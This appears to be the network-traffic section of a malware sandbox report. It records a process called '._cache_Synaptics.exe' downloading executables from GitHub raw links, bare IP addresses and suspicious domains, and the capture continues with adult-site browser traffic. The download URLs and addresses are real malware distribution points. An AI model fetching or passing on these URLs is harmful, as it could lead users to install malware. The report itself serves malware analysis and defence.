Content-Length: 1652
Server: UploadServer
Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
Content-Security-Policy: sandbox allow-scripts
DNS

227.212.58.216.in-addr.arpa

Remote address:

8.8.8.8:53

Request

227.212.58.216.in-addr.arpa

IN PTR

Response

227.212.58.216.in-addr.arpa

IN PTR

ams16s22-in-f2271e100net

227.212.58.216.in-addr.arpa

IN PTR

ams16s22-in-f3�J

227.212.58.216.in-addr.arpa

IN PTR

lhr25s28-in-f3�J
DNS

225.16.217.172.in-addr.arpa

Remote address:

8.8.8.8:53

Request

225.16.217.172.in-addr.arpa

IN PTR

Response

225.16.217.172.in-addr.arpa

IN PTR

lhr48s28-in-f11e100net

225.16.217.172.in-addr.arpa

IN PTR

mad08s04-in-f1�H
GET

http://github.com/yuriksq/papilla/raw/refs/heads/main/jrockekcurje.exe

._cache_Synaptics.exe

Remote address:

20.26.156.215:80

Request

GET /yuriksq/papilla/raw/refs/heads/main/jrockekcurje.exe HTTP/1.1
Host: github.com

Response

HTTP/1.1 301 Moved Permanently

Content-Length: 0
Location: https://github.com/yuriksq/papilla/raw/refs/heads/main/jrockekcurje.exe
GET

https://github.com/yuriksq/papilla/raw/refs/heads/main/jrockekcurje.exe

._cache_Synaptics.exe

Remote address:

20.26.156.215:443

Request

GET /yuriksq/papilla/raw/refs/heads/main/jrockekcurje.exe HTTP/1.1
Host: github.com

Response

HTTP/1.1 302 Found

Server: GitHub.com
Date: Sat, 01 Feb 2025 09:22:23 GMT
Content-Type: text/html; charset=utf-8
Vary: X-PJAX, X-PJAX-Container, Turbo-Visit, Turbo-Frame, Accept-Encoding, Accept, X-Requested-With
Access-Control-Allow-Origin:
Location: https://raw.githubusercontent.com/yuriksq/papilla/refs/heads/main/jrockekcurje.exe
Cache-Control: no-cache
Strict-Transport-Security: max-age=31536000; includeSubdomains; preload
X-Frame-Options: deny
X-Content-Type-Options: nosniff
X-XSS-Protection: 0
Referrer-Policy: no-referrer-when-downgrade
Content-Security-Policy: default-src 'none'; base-uri 'self'; child-src github.com/assets-cdn/worker/ github.com/webpack/ github.com/assets/ gist.github.com/assets-cdn/worker/; connect-src 'self' uploads.github.com www.githubstatus.com collector.github.com raw.githubusercontent.com api.github.com github-cloud.s3.amazonaws.com github-production-repository-file-5c1aeb.s3.amazonaws.com github-production-upload-manifest-file-7fdce7.s3.amazonaws.com github-production-user-asset-6210df.s3.amazonaws.com *.rel.tunnels.api.visualstudio.com wss://*.rel.tunnels.api.visualstudio.com objects-origin.githubusercontent.com copilot-proxy.githubusercontent.com proxy.individual.githubcopilot.com proxy.business.githubcopilot.com proxy.enterprise.githubcopilot.com *.actions.githubusercontent.com wss://*.actions.githubusercontent.com productionresultssa0.blob.core.windows.net/ productionresultssa1.blob.core.windows.net/ productionresultssa2.blob.core.windows.net/ productionresultssa3.blob.core.windows.net/ productionresultssa4.blob.core.windows.net/ productionresultssa5.blob.core.windows.net/ productionresultssa6.blob.core.windows.net/ productionresultssa7.blob.core.windows.net/ productionresultssa8.blob.core.windows.net/ productionresultssa9.blob.core.windows.net/ productionresultssa10.blob.core.windows.net/ productionresultssa11.blob.core.windows.net/ productionresultssa12.blob.core.windows.net/ productionresultssa13.blob.core.windows.net/ productionresultssa14.blob.core.windows.net/ productionresultssa15.blob.core.windows.net/ productionresultssa16.blob.core.windows.net/ productionresultssa17.blob.core.windows.net/ productionresultssa18.blob.core.windows.net/ productionresultssa19.blob.core.windows.net/ github-production-repository-image-32fea6.s3.amazonaws.com github-production-release-asset-2e65be.s3.amazonaws.com insights.github.com wss://alive.github.com api.githubcopilot.com api.individual.githubcopilot.com api.business.githubcopilot.com api.enterprise.githubcopilot.com; font-src github.githubassets.com; form-action 'self' github.com gist.github.com copilot-workspace.githubnext.com objects-origin.githubusercontent.com; frame-ancestors 'none'; frame-src viewscreen.githubusercontent.com notebooks.githubusercontent.com; img-src 'self' data: blob: github.githubassets.com media.githubusercontent.com camo.githubusercontent.com identicons.github.com avatars.githubusercontent.com private-avatars.githubusercontent.com github-cloud.s3.amazonaws.com objects.githubusercontent.com secured-user-images.githubusercontent.com/ user-images.githubusercontent.com/ private-user-images.githubusercontent.com opengraph.githubassets.com github-production-user-asset-6210df.s3.amazonaws.com customer-stories-feed.github.com spotlights-feed.github.com objects-origin.githubusercontent.com *.githubusercontent.com; manifest-src 'self'; media-src github.com user-images.githubusercontent.com/ secured-user-images.githubusercontent.com/ private-user-images.githubusercontent.com github-production-user-asset-6210df.s3.amazonaws.com gist.github.com; script-src github.githubassets.com; style-src 'unsafe-inline' github.githubassets.com; upgrade-insecure-requests; worker-src github.com/assets-cdn/worker/ github.com/webpack/ github.com/assets/ gist.github.com/assets-cdn/worker/
Content-Length: 0
X-GitHub-Request-Id: ED9F:3A8E8:83693C:A89618:679DE7CF
DNS

14.227.111.52.in-addr.arpa

Remote address:

8.8.8.8:53

Request

14.227.111.52.in-addr.arpa

IN PTR

Response
GET

http://ip-api.com/json/

jrockekcurje.exe

Remote address:

208.95.112.1:80

Request

GET /json/ HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 6.3; rv:48.0) Gecko/20100101 Firefox/48.0
Host: ip-api.com
Connection: Keep-Alive

Response

HTTP/1.1 200 OK

Date: Sat, 01 Feb 2025 09:22:24 GMT
Content-Type: application/json; charset=utf-8
Content-Length: 291
Access-Control-Allow-Origin: *
X-Ttl: 20
X-Rl: 43
GET

http://2.59.163.172/svc.exe

._cache_Synaptics.exe

Remote address:

2.59.163.172:80

Request

GET /svc.exe HTTP/1.1
Host: 2.59.163.172
Connection: Keep-Alive

Response

HTTP/1.1 200 OK

Date: Sat, 01 Feb 2025 09:22:25 GMT
Server: Apache/2.4.62 (Debian)
Last-Modified: Mon, 27 Jan 2025 08:22:54 GMT
ETag: "3f400-62cabc86ed380"
Accept-Ranges: bytes
Content-Length: 259072
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: application/x-msdos-program
DNS

getsolara.dev

._cache_Synaptics.exe

Remote address:

8.8.8.8:53

Request

getsolara.dev

IN A

Response

getsolara.dev

IN A

172.67.203.125

getsolara.dev

IN A

104.21.93.27
GET

https://getsolara.dev:2096/download/static/files/BootstrapperNew.exe

._cache_Synaptics.exe

Remote address:

172.67.203.125:2096

Request

GET /download/static/files/BootstrapperNew.exe HTTP/1.1
Host: getsolara.dev:2096
Connection: Keep-Alive

Response

HTTP/1.1 200 OK

Date: Sat, 01 Feb 2025 09:22:27 GMT
Content-Type: application/octet-stream
Content-Length: 3004928
Connection: keep-alive
Access-Control-Allow-Origin: *
Cache-Control: public, max-age=0, must-revalidate
ETag: "bf4417fbe63a2e6c45dea828bc21c5a9"
referrer-policy: strict-origin-when-cross-origin
x-content-type-options: nosniff
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=ej7XsvX7Kjf3QcHN7%2BdHBjDqjwM7snHMBHXowKVW4%2BxcNeYksAAsVyxqqScA1yiuHHcfJHochlZG6LrEvMZBet%2B08xtHiFk8TiXJyMqlQ%2FFNok4HGdiMojNlJpCXTKE%2BrsOd7cw%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Vary: Accept-Encoding
CF-Cache-Status: DYNAMIC
Strict-Transport-Security: max-age=0
Server: cloudflare
CF-RAY: 90b0e086abccbd7e-LHR
alt-svc: h3=":2096"; ma=86400
server-timing: cfL4;desc="?proto=TCP&rtt=28525&min_rtt=26349&rtt_var=7213&sent=6&recv=6&lost=0&retrans=0&sent_bytes=2976&recv_bytes=406&delivery_rate=145247&cwnd=239&unsent_bytes=0&cid=2b3b70fcf6d97de6&ts=103&x=0"
DNS

172.163.59.2.in-addr.arpa

Remote address:

8.8.8.8:53

Request

172.163.59.2.in-addr.arpa

IN PTR

Response

172.163.59.2.in-addr.arpa

IN PTR

51380ip-ptrtech
DNS

172.163.59.2.in-addr.arpa

Remote address:

8.8.8.8:53

Request

172.163.59.2.in-addr.arpa

IN PTR
DNS

125.203.67.172.in-addr.arpa

Remote address:

8.8.8.8:53

Request

125.203.67.172.in-addr.arpa

IN PTR

Response
GET

http://89.197.154.116/Rar.exe

._cache_Synaptics.exe

Remote address:

89.197.154.116:80

Request

GET /Rar.exe HTTP/1.1
Host: 89.197.154.116
Connection: Keep-Alive

Response

HTTP/1.1 200 OK

Date: Sat, 01 Feb 2025 14:05:02 GMT
Server: Apache/2.4.53 (Debian)
Last-Modified: Mon, 09 Dec 2024 21:43:57 GMT
ETag: "8ecd8-628dd43022dc9"
Accept-Ranges: bytes
Content-Length: 584920
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: application/x-msdos-program
DNS

tengfeidn.com

._cache_Synaptics.exe

Remote address:

8.8.8.8:53

Request

tengfeidn.com

IN A

Response

tengfeidn.com

IN A

139.196.217.38
DNS

116.154.197.89.in-addr.arpa

Remote address:

8.8.8.8:53

Request

116.154.197.89.in-addr.arpa

IN PTR

Response

116.154.197.89.in-addr.arpa

IN PTR

89-197-154-116virtual1couk
DNS

rddissisifigifidi.net

._cache_Synaptics.exe

Remote address:

8.8.8.8:53

Request

rddissisifigifidi.net

IN A

Response

rddissisifigifidi.net

IN A

185.215.113.66
GET

http://103.110.33.188/autoupdate/hostfile/Autoupdate.exe

._cache_Synaptics.exe

Remote address:

103.110.33.188:80

Request

GET /autoupdate/hostfile/Autoupdate.exe HTTP/1.1
Host: 103.110.33.188
Connection: Keep-Alive

Response

HTTP/1.1 200 OK

Date: Sat, 01 Feb 2025 09:23:23 GMT
Server: Apache/2.4.52 (Win64) OpenSSL/1.1.1m PHP/7.4.27
Last-Modified: Sun, 20 Oct 2024 04:32:47 GMT
ETag: "1d7400-624e107371c0a"
Accept-Ranges: bytes
Content-Length: 1930240
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: application/x-msdownload
DNS

188.33.110.103.in-addr.arpa

Remote address:

8.8.8.8:53

Request

188.33.110.103.in-addr.arpa

IN PTR

Response
GET

http://103.110.33.188/autoupdate/hostfile/version.xml

Autoupdate.exe

Remote address:

103.110.33.188:80

Request

GET /autoupdate/hostfile/version.xml HTTP/1.1
Host: 103.110.33.188
Connection: Keep-Alive

Response

HTTP/1.1 200 OK

Date: Sat, 01 Feb 2025 09:23:28 GMT
Server: Apache/2.4.52 (Win64) OpenSSL/1.1.1m PHP/7.4.27
Last-Modified: Thu, 30 Jan 2025 13:23:43 GMT
ETag: "e8f8f-62cec55d0e5c9"
Accept-Ranges: bytes
Content-Length: 954255
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: application/xml
GET

http://103.110.33.188/autoupdate/hostfile/Autoupdate.exe

Autoupdate.exe

Remote address:

103.110.33.188:80

Request

GET /autoupdate/hostfile/Autoupdate.exe HTTP/1.1
Host: 103.110.33.188

Response

HTTP/1.1 200 OK

Date: Sat, 01 Feb 2025 09:23:31 GMT
Server: Apache/2.4.52 (Win64) OpenSSL/1.1.1m PHP/7.4.27
Last-Modified: Sun, 20 Oct 2024 04:32:47 GMT
ETag: "1d7400-624e107371c0a"
Accept-Ranges: bytes
Content-Length: 1930240
Content-Type: application/x-msdownload

151.101.130.49:443

https://urlhaus.abuse.ch/downloads/text_online/

tls, http

._cache_Synaptics.exe

8.7kB
480.6kB
180
353

HTTP Request

GET https://urlhaus.abuse.ch/downloads/text_online/

HTTP Response

200
151.101.130.49:443

https://urlhaus.abuse.ch/downloads/text_online/

tls, http

._cache_Synaptics.exe

8.7kB
480.9kB
180
353

HTTP Request

GET https://urlhaus.abuse.ch/downloads/text_online/

HTTP Response

200
193.143.1.180:80

._cache_Synaptics.exe

260 B
5
20.26.156.215:443

github.com

tls

._cache_Synaptics.exe

1.3kB
16.2kB
15
19
185.199.109.133:443

https://raw.githubusercontent.com/hwangyounggul33/windows10/refs/heads/main/PrivacyPolicy.exe

tls, http

._cache_Synaptics.exe

28.6kB
1.2MB
548
876

HTTP Request

GET https://raw.githubusercontent.com/seven7174j/Repo/main/NVIDIA.exe

HTTP Response

200

HTTP Request

GET https://raw.githubusercontent.com/cavxsy/crazy.spoofer/refs/heads/main/loader.exe

HTTP Response

200

HTTP Request

GET https://raw.githubusercontent.com/hwangyounggul33/windows10/refs/heads/main/PrivacyPolicy.exe

HTTP Response

200
203.232.37.151:80

http://203.232.37.151/pornhub_downloader.exe

http

._cache_Synaptics.exe

1.9kB
93.1kB
39
69

HTTP Request

GET http://203.232.37.151/pornhub_downloader.exe

HTTP Response

200
193.58.121.250:7175

NVIDIA.exe

260 B
200 B
5
5
150.171.28.10:443

https://g.bing.com/neg/0?action=emptycreativeimpression&adUnitId=11730597&publisherId=251978541&rid=5bf812b2d0b042fca159418a1a9d5190&localId=w:E9D43C1E-0C9B-6222-E427-E1798E5D5858&deviceId=6896210250783501&anid=

tls, http2

2.0kB
9.3kB
21
18

HTTP Request

GET https://g.bing.com/neg/0?action=emptycreativeimpression&adUnitId=11730597&publisherId=251978541&rid=5bf812b2d0b042fca159418a1a9d5190&localId=w:E9D43C1E-0C9B-6222-E427-E1798E5D5858&deviceId=6896210250783501&anid=

HTTP Response

204

HTTP Request

GET https://g.bing.com/neg/0?action=emptycreative&adUnitId=11730597&publisherId=251978541&rid=5bf812b2d0b042fca159418a1a9d5190&localId=w:E9D43C1E-0C9B-6222-E427-E1798E5D5858&deviceId=6896210250783501&anid=

HTTP Response

204

HTTP Request

GET https://g.bing.com/neg/0?action=emptycreativeimpression&adUnitId=11730597&publisherId=251978541&rid=5bf812b2d0b042fca159418a1a9d5190&localId=w:E9D43C1E-0C9B-6222-E427-E1798E5D5858&deviceId=6896210250783501&anid=

HTTP Response

204
185.215.113.16:80

._cache_Synaptics.exe

260 B
5
69.42.215.252:80

http://freedns.afraid.org/api/?action=getdyndns&sha=a30fa98efc092684e8d1c5cff797bcc613562978

http

Synaptics.exe

752 B
415 B
13
4

HTTP Request

GET http://freedns.afraid.org/api/?action=getdyndns&sha=a30fa98efc092684e8d1c5cff797bcc613562978

HTTP Response

200
66.254.114.41:443

https://www.pornhub.com/service-worker.js

tls, http2

msedge.exe

38.1kB
1.5MB
644
1056

HTTP Request

GET https://www.pornhub.com/

HTTP Response

200

HTTP Request

GET https://www.pornhub.com/_xa/ads_batch?ads=true&clientType=mobile&channel[context_page_type]=home&channel[info]=%7B%22actor_id%22%3Anull%2C%22content_type%22%3Anull%2C%22video_id%22%3Anull%2C%22timestamp%22%3A1738401681%2C%22hash%22%3A%22bb0cc0bb54986d82f1c5783a8b479079%22%7D&channel[site]=pornhub&site_id=2&device_type=tablet&hbresp=header&hb=1EBD11A3-881C-43E7-801C-DBD18D260596&data=%5B%7B%22spots%22%3A%5B%7B%22zone%22%3A5%7D%2C%7B%22zone%22%3A2184351%7D%5D%7D%5D&noc=1&dm=www.pornhub.com/_xa

HTTP Response

202

HTTP Request

GET https://www.pornhub.com/_xa/ads_batch?ads=true&clientType=mobile&channel[context_page_type]=home&channel[info]=%7B%22actor_id%22%3Anull%2C%22content_type%22%3Anull%2C%22video_id%22%3Anull%2C%22timestamp%22%3A1738401681%2C%22hash%22%3A%22bb0cc0bb54986d82f1c5783a8b479079%22%7D&channel[site]=pornhub&site_id=2&device_type=tablet&hc=1EBD11A3-881C-43E7-801C-DBD18D260596&data=%5B%7B%22spots%22%3A%5B%7B%22zone%22%3A5%7D%5D%7D%5D&noc=1&dm=www.pornhub.com/_xa

HTTP Request

GET https://www.pornhub.com/_xa/ads_batch?ads=true&clientType=mobile&channel[context_page_type]=home&channel[info]=%7B%22actor_id%22%3Anull%2C%22content_type%22%3Anull%2C%22video_id%22%3Anull%2C%22timestamp%22%3A1738401681%2C%22hash%22%3A%22bb0cc0bb54986d82f1c5783a8b479079%22%7D&channel[site]=pornhub&site_id=2&device_type=tablet&hc=1EBD11A3-881C-43E7-801C-DBD18D260596&data=%5B%7B%22spots%22%3A%5B%7B%22zone%22%3A2184351%7D%5D%7D%5D&noc=1&dm=www.pornhub.com/_xa

HTTP Response

200

HTTP Response

200

HTTP Request

POST https://www.pornhub.com/_i?type=event&event=consent-modal-open&origin=homepage&origin_url=%2F

HTTP Response

200

HTTP Request

GET https://www.pornhub.com/front/menu_all_cached?segment=straight&token=MTczODQwMTY4MYWp8IhWD2fH8BFd7quoCGMsn1Qoyhze5STyec9MqPM-aB_r_k5kXkRY-83rt9E-xWHw84bCACqGFu7cAOPoj5c.

HTTP Response

200

HTTP Request

GET https://www.pornhub.com/_xa/deep_pixel?info=CiQwYWY2ZWY2NC1lNTBhLTQ1NjgtYmFiZi00ODU2ZWM4MzgyZDAQkc%2F3vAYaImJmNDM2N2VhM2ZhMTQ1MjJhNmEwMTk4MWEyZDQ4YjBjLTEgAjAFOAVAtZEXSNnDz%2BADUgEyWNXrqd4DYIe7tYMEciAzNThkNTRlMjU5OTk0YTBjOWE3MWRjMjE2MjJlOGNjOYEB8WjjiLX45D6SAQJHQpoBA0VOR6IBBkxvbmRvbsoBFWNvZ2VudCBjb21tdW5pY2F0aW9uc9IBBHdpZmnaAQd3aW5kb3dz4gEOMTgxLjIxNS4xNzYuODP6AQ4xODEuMjE1LjE3Ni44M4ICB2RlZDc2NTSSAgRlZGdlmgIERUMxTqoCBDEwLjCyAgQ5Mi4w2AKV3YDcB%2BAC6dCynwT6AgExggNfeyJhY3Rvcl9pZCI6bnVsbCwiY29udGVudF90eXBlIjpudWxsLCJ2aWRlb19pZCI6bnVsbCwiaGFzaCI6ImJiMGNjMGJiNTQ5ODZkODJmMWM1NzgzYThiNDc5MDc5In2SAwdkZXNrdG9wmgMCZW6oAwHCAwRob21lmAQB2AQj&noc=1&ua=Mozilla%2F5.0+%28Windows+NT+10.0%3B+Win64%3B+x64%29+AppleWebKit%2F537.36+%28KHTML%2C+like+Gecko%29+Chrome%2F92.0.4515.131+Safari%2F537.36+Edg%2F92.0.902.67

HTTP Request

GET https://www.pornhub.com/_xa/deep_pixel?info=CiRiMGNkZGUxZi0zNWYzLTQ2MzEtYWExMi02ODY4NDU4OTQxNTIQkc%2F3vAYaImJmNDM2N2VhM2ZhMTQ1MjJhNmEwMTk4MWEyZDQ4YjBjLTIoATCfqYUBOJ%2BphQFIncCd4gNSATJY29aI4ANg1fK3hQRyIDM1OGQ1NGUyNTk5OTRhMGM5YTcxZGMyMTYyMmU4Y2M5gQEdJET5ghYSP5IBAkdCmgEDRU5HogEGTG9uZG9uygEVY29nZW50IGNvbW11bmljYXRpb25z0gEEd2lmadoBB3dpbmRvd3PiAQ4xODEuMjE1LjE3Ni44M%2FoBDjE4MS4yMTUuMTc2LjgzggIHZGVkNzY1NJICBGVkZ2WaAgRFQzFOqgIEMTAuMLICBDkyLjDYArX65%2BgH4AL7xbSvBPoCATGCA197ImFjdG9yX2lkIjpudWxsLCJjb250ZW50X3R5cGUiOm51bGwsInZpZGVvX2lkIjpudWxsLCJoYXNoIjoiYmIwY2MwYmI1NDk4NmQ4MmYxYzU3ODNhOGI0NzkwNzkifZIDB2Rlc2t0b3CaAwJlbsIDBGhvbWWYBAHYBCM%3D&noc=1&ua=Mozilla%2F5.0+%28Windows+NT+10.0%3B+Win64%3B+x64%29+AppleWebKit%2F537.36+%28KHTML%2C+like+Gecko%29+Chrome%2F92.0.4515.131+Safari%2F537.36+Edg%2F92.0.902.67

HTTP Response

200

HTTP Response

200

HTTP Request

GET https://www.pornhub.com/_xa/fla/log?action=ad_view&ad_id=1085143381&campaign_id=1011310621&initial_zone_id=2184351&member_id=1006775131&zone_id=2184351

HTTP Response

200

HTTP Request

GET https://www.pornhub.com/service-worker.js

HTTP Response

200
206.217.142.166:1234

powershell.exe

260 B
5
64.210.156.19:443

https://static.trafficjunky.com/invocation/popunder/production/popunder.min.js

tls, http2

msedge.exe

2.9kB
45.1kB
36
41

HTTP Request

GET https://static.trafficjunky.com/invocation/embeddedads/production/embeddedads.es6.min.js

HTTP Request

GET https://static.trafficjunky.com/ab/ads_test.js

HTTP Response

200

HTTP Response

200

HTTP Request

GET https://static.trafficjunky.com/invocation/popunder/production/popunder.min.js

HTTP Response

200
64.210.156.19:443

static.trafficjunky.com

tls

msedge.exe

959 B
4.4kB
8
6
64.210.156.21:443

https://ei.phncdn.com/www-static/js/promo-banner.js?cache=2025013001

tls, http2

msedge.exe

34.7kB
910.2kB
577
690

HTTP Request

GET https://ei.phncdn.com/www-static/css/ph-icons.css?cache=2025013001

HTTP Request

GET https://ei.phncdn.com/www-static/css/global-backgrounds.css?cache=2025013001

HTTP Request

GET https://ei.phncdn.com/www-static/css/generated-header.css?cache=2025013001

HTTP Request

GET https://ei.phncdn.com/www-static/css/front-index-pc.css?cache=2025013001

HTTP Request

GET https://ei.phncdn.com/www-static/css/flags/round_flag.css?cache=2025013001

HTTP Request

GET https://ei.phncdn.com/www-static/js/lib/interval-helper.js?cache=2025013001

HTTP Request

GET https://ei.phncdn.com/www-static/js/lib/utils/mg_utils-1.0.0.js?cache=2025013001

HTTP Request

GET https://ei.phncdn.com/www-static/js/cookieBanner/cookie_banner.js?cache=2025013001

HTTP Request

GET https://ei.phncdn.com/www-static/js/lib/ph-functions.js?cache=2025013001

HTTP Response

200

HTTP Response

200

HTTP Response

200

HTTP Response

200

HTTP Response

200

HTTP Response

200

HTTP Response

200

HTTP Response

200

HTTP Response

200

HTTP Request

GET https://ei.phncdn.com/www-static/js/mg_modal-1.0.0.js?cache=2025013001

HTTP Response

200

HTTP Request

GET https://ei.phncdn.com/www-static/images/pornhub_logo_straight.svg?cache=2025013001

HTTP Response

200

HTTP Request

GET https://ei.phncdn.com/www-static/css/large.css?cache=2025013001

HTTP Response

200

HTTP Request

GET https://ei.phncdn.com/www-static/images/sprite-icons.png?cache=2025013001

HTTP Response

200

HTTP Request

GET https://ei.phncdn.com/www-static/js/lib/vue/vue.min.js

HTTP Request

GET https://ei.phncdn.com/www-static/js/lib/vue/vue-custom-element.min.js

HTTP Request

GET https://ei.phncdn.com/www-static/js/lib/generated-lib.js?cache=2025013001

HTTP Request

GET https://ei.phncdn.com/www-static/js/lib/networkbar-5.0.0.js?cache=2025013001

HTTP Request

GET https://ei.phncdn.com/www-static/js/front-index.js?cache=2025013001

HTTP Response

200

HTTP Response

200

HTTP Response

200

HTTP Response

200

HTTP Response

200

HTTP Request

GET https://ei.phncdn.com/www-static/css/header-non-critical.css?cache=2025013001

HTTP Request

GET https://ei.phncdn.com/www-static/css/commons-non-critical.css?cache=2025013001

HTTP Request

GET https://ei.phncdn.com/www-static/css/modals_commons.css?cache=2025013001

HTTP Request

GET https://ei.phncdn.com/www-static/css/playlist-base.css?cache=2025013001

HTTP Request

GET https://ei.phncdn.com/www-static/css/premium/premium-modals.css?cache=2025013001

HTTP Request

GET https://ei.phncdn.com/www-static/css/pc/onboardingModalFlow/onboardingModalFlow.css?cache=2025013001

HTTP Response

200

HTTP Response

200

HTTP Response

200

HTTP Response

200

HTTP Response

200

HTTP Response

200

HTTP Request

GET https://ei.phncdn.com/www-static/images/countryFlags/svgs/united_kingdom.svg?cache=2025013001

HTTP Request

GET https://ei.phncdn.com/www-static/images/verified-badge.svg?cache=2025013001

HTTP Request

GET https://ei.phncdn.com/www-static/images/trophy-icon-Pornstar.svg?cache=2025013001

HTTP Request

GET https://ei.phncdn.com/www-static/images/channel-badge.svg?cache=2025013001

HTTP Response

200

HTTP Response

200

HTTP Response

200

HTTP Response

200

HTTP Request

GET https://ei.phncdn.com/videos/202412/30/462534851/original/(m=q709I4ZbeafTGgaaaa)(mh=OKGt-zxSfWNAq1NG)0.jpg

HTTP Response

200

HTTP Request

GET https://ei.phncdn.com/videos/202412/07/461534191/original/(m=qV9IP1ZbeafTGgaaaa)(mh=0SHWTrPaOHdTUUll)0.jpg

HTTP Request

GET https://ei.phncdn.com/videos/202403/29/450301291/original/(m=eafTGgaaaa)(mh=tQ2aQ8wFb76j1a28)9.jpg

HTTP Request

GET https://ei.phncdn.com/videos/202408/28/457078131/original/(m=eafTGgaaaa)(mh=LVClI6gRBIvnxv7U)11.jpg

HTTP Request

GET https://ei.phncdn.com/videos/202412/30/462539761/thumbs_83/(m=eafTGgaaaa)(mh=n0nD5CxXlBkFcIaC)16.jpg

HTTP Request

GET https://ei.phncdn.com/videos/202501/13/463137695/original/(m=eafTGgaaaa)(mh=vdcGAWk3ev4uaja7)4.jpg

HTTP Request

GET https://ei.phncdn.com/videos/202501/02/462653511/original/(m=q3Q443ZbeafTGgaaaa)(mh=wDnoiWlI3u_ju20N)0.jpg

HTTP Request

GET https://ei.phncdn.com/videos/202501/16/463263545/original/(m=qOWPY4ZbeafTGgaaaa)(mh=ufZGkMMngnzrh-Le)0.jpg

HTTP Request

GET https://ei.phncdn.com/videos/202403/22/449967081/original/(m=eafTGgaaaa)(mh=gK7Ej6aE349pNbqr)7.jpg

HTTP Request

GET https://ei.phncdn.com/videos/202412/28/462446221/original/(m=eafTGgaaaa)(mh=S7w2HkQAyLj1avjs)3.jpg

HTTP Request

GET https://ei.phncdn.com/videos/202410/03/458635471/original/(m=qW4U-2ZbeafTGgaaaa)(mh=ch-BhzWzJUYEPzUe)0.jpg

HTTP Request

GET https://ei.phncdn.com/videos/202411/22/460884731/original/(m=qU_WK0ZbeafTGgaaaa)(mh=3L-GcS5sL28Zgoat)0.jpg

HTTP Request

GET https://ei.phncdn.com/videos/202409/17/457895811/original/(m=qU7LLVZbeafTGgaaaa)(mh=sBrVCjphT5Hs_S5N)0.jpg

HTTP Request

GET https://ei.phncdn.com/videos/202412/19/462078811/original/(m=eafTGgaaaa)(mh=xEJTuP3vZzml1q6a)10.jpg

HTTP Request

GET https://ei.phncdn.com/videos/202501/02/462628741/original/(m=q2TXV3ZbeafTGgaaaa)(mh=GZWSjMcOuwB4ymQQ)0.jpg

HTTP Request

GET https://ei.phncdn.com/videos/202412/25/462313721/thumbs_45/(m=eafTGgaaaa)(mh=lIvwJpWvSe4s8CPc)9.jpg

HTTP Request

GET https://ei.phncdn.com/videos/202412/28/462460711/original/(m=eafTGgaaaa)(mh=NYZ-CqRAal4PS8nf)16.jpg

HTTP Request

GET https://ei.phncdn.com/videos/202412/19/462088941/thumbs_30/(m=eafTGgaaaa)(mh=dccPnt6mBNHtL-U2)2.jpg

HTTP Request

GET https://ei.phncdn.com/videos/202410/09/458908271/original/(m=eafTGgaaaa)(mh=e9BYBDiNkROTmyaM)16.jpg

HTTP Request

GET https://ei.phncdn.com/videos/202406/24/454279741/original/(m=eafTGgaaaa)(mh=mKRxcaUfkT2SFDBj)2.jpg

HTTP Request

GET https://ei.phncdn.com/videos/202412/12/461744655/original/(m=qYKW01ZbeafTGgaaaa)(mh=sDeGJ5PgkFTHZBLN)0.jpg

HTTP Request

GET https://ei.phncdn.com/videos/202412/14/461859861/original/(m=qHPW71ZbeafTGgaaaa)(mh=LLrCy1e3LC7dp5y2)0.jpg

HTTP Request

GET https://ei.phncdn.com/videos/202412/07/461568571/original/(m=qMQJU1ZbeafTGgaaaa)(mh=bF4BaqUEgi5ySHEb)0.jpg

HTTP Request

GET https://ei.phncdn.com/videos/202411/25/461003591/original/(m=qOQ843ZbeafTGgaaaa)(mh=tXBDYyVVrq0TX83d)0.jpg

HTTP Request

GET https://ei.phncdn.com/videos/202501/01/462591261/original/(m=qRRY63ZbeafTGgaaaa)(mh=1ztF2NVc5WbaS9AD)0.jpg

HTTP Request

GET https://ei.phncdn.com/videos/202412/31/462573131/original/(m=qH77Z3ZbeafTGgaaaa)(mh=nfC6rOT_oT6AfKMA)0.jpg

HTTP Request

GET https://ei.phncdn.com/videos/202501/23/463562145/original/(m=qSL3K5ZbeafTGgaaaa)(mh=BJpm4_b3Z8VGHQWA)0.jpg

HTTP Response

200

HTTP Response

200

HTTP Response

200

HTTP Response

200

HTTP Response

200

HTTP Response

200

HTTP Response

200

HTTP Response

200

HTTP Response

200

HTTP Request

GET https://ss.phncdn.com/head/load-1.0.3.js

HTTP Response

200

HTTP Response

200

HTTP Response

200

HTTP Response

200

HTTP Response

200

HTTP Response

200

HTTP Response

200

HTTP Response

200

HTTP Response

200

HTTP Response

200

HTTP Response

200

HTTP Response

200

HTTP Response

200

HTTP Response

200

HTTP Response

200

HTTP Response

200

HTTP Response

200

HTTP Response

200

HTTP Request

GET https://ei.phncdn.com/www-static/favicon.ico?cache=2025013001

HTTP Request

GET https://ei.phncdn.com/www-static/js/lib/jquery-3.6.0.min.js

HTTP Request

GET https://ei.phncdn.com/www-static/js/header.js?cache=2025013001

HTTP Request

GET https://ei.phncdn.com/www-static/js/lib/jquery-ui-1.13.2.min.js

HTTP Request

GET https://ei.phncdn.com/www-static/js/lib/jquery.slimscroll.min.js

HTTP Request

GET https://ei.phncdn.com/www-static/js/phub.js?cache=2025013001

HTTP Request

GET https://ei.phncdn.com/www-static/js/lib/user-clogs.js?cache=2025013001

HTTP Request

GET https://ei.phncdn.com/www-static/js/playlist/playlist-basic.js?cache=2025013001

HTTP Request

GET https://ei.phncdn.com/www-static/js/widgets-live-popup.js?cache=2025013001

HTTP Request

GET https://ei.phncdn.com/www-static/js/playlist/playlists-common.js?cache=2025013001

HTTP Request

GET https://ei.phncdn.com/www-static/js/v-recaptcha.js?cache=2025013001

HTTP Request

GET https://ei.phncdn.com/www-static/js/lib/signinbox.js?cache=2025013001

HTTP Request

GET https://ei.phncdn.com/www-static/js/signin.js?cache=2025013001

HTTP Request

GET https://ei.phncdn.com/www-static/js/create-account.js?cache=2025013001

HTTP Request

GET https://ei.phncdn.com/www-static/js/onboardingModalFlow/widgets-onboardingModalFlow.js?cache=2025013001

HTTP Request

GET https://ei.phncdn.com/www-static/js/ph-footer.js?cache=2025013001

